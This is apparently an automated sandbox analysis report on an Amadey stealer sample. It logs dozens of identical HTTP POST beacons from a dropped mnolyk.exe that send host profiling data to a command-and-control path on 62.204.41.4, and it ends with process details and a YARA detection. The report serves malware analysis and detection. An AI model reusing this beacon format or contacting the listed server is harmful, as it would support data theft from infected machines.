Feb 7, 2023 20:01:12.702989101 CET	200	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:12.766032934 CET	200	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
81	192.168.2.6	49801	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:12.934086084 CET	201	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:12.996850014 CET	201	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
82	192.168.2.6	49802	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:13.174021006 CET	202	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:13.239062071 CET	202	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
83	192.168.2.6	49803	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:13.424989939 CET	203	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:13.487775087 CET	203	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
84	192.168.2.6	49804	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:13.672357082 CET	204	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:13.735300064 CET	204	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
85	192.168.2.6	49805	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:13.918183088 CET	205	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:13.980031013 CET	205	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
86	192.168.2.6	49806	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:14.154494047 CET	206	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:14.220354080 CET	206	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
87	192.168.2.6	49807	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:14.403500080 CET	207	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:14.468887091 CET	207	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
88	192.168.2.6	49808	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:14.637798071 CET	208	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:14.701153040 CET	208	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
89	192.168.2.6	49809	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:14.874634027 CET	209	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:14.937292099 CET	209	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.6	49727	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:53.058922052 CET	114	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:53.126007080 CET	114	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
90	192.168.2.6	49810	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:15.107347012 CET	210	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:15.174127102 CET	210	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
91	192.168.2.6	49811	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:15.342261076 CET	211	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:15.405101061 CET	211	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
92	192.168.2.6	49812	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:15.578134060 CET	212	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:15.639976978 CET	213	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
93	192.168.2.6	49814	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:15.831909895 CET	220	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:15.893851995 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
94	192.168.2.6	49815	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:16.077954054 CET	221	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:16.143034935 CET	221	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
95	192.168.2.6	49816	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:16.328216076 CET	222	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:16.390471935 CET	222	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
96	192.168.2.6	49817	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:16.563417912 CET	223	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:16.628117085 CET	223	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
97	192.168.2.6	49818	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:16.810089111 CET	224	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:16.873842955 CET	224	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
98	192.168.2.6	49819	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:17.050745964 CET	225	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:17.115938902 CET	225	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
99	192.168.2.6	49820	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:17.299894094 CET	226	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:17.364586115 CET	226	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: file.exePID: 1216, Parent PID: 3452

General

Target ID:	0
Start time:	20:00:13
Start date:	07/02/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0xeb0000
File size:	537088 bytes
MD5 hash:	16755B75334B8655BC2357553A9FDAB4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.250204509.0000000004A2A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: bfCg.exePID: 2564, Parent PID: 1216

General

Target ID:	1
Start time:	20:00:13
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe
Imagebase:	0x940000
File size:	346112 bytes
MD5 hash:	DAE3685D13248C42313D46F76E2EC968
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
